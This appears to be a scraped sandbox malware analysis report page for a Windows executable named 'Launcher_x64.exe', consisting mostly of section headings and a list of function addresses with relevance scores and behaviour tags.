Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
Launcher_x64.exe

Function 00D9019E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00D61C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Function 00D76642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 00D620C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
libraryloaderCOMMON

Function 00D61DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Function 00D6F293 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 00D7D3A4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 00D7DB7D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 00D77192 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00D62010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 00D756B7 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Function 00D614C0 Relevance: 1.8, APIs: 1, Instructions: 308
COMMON

Function 00D68570 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Function 00D7670D Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Function 00D756F1 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE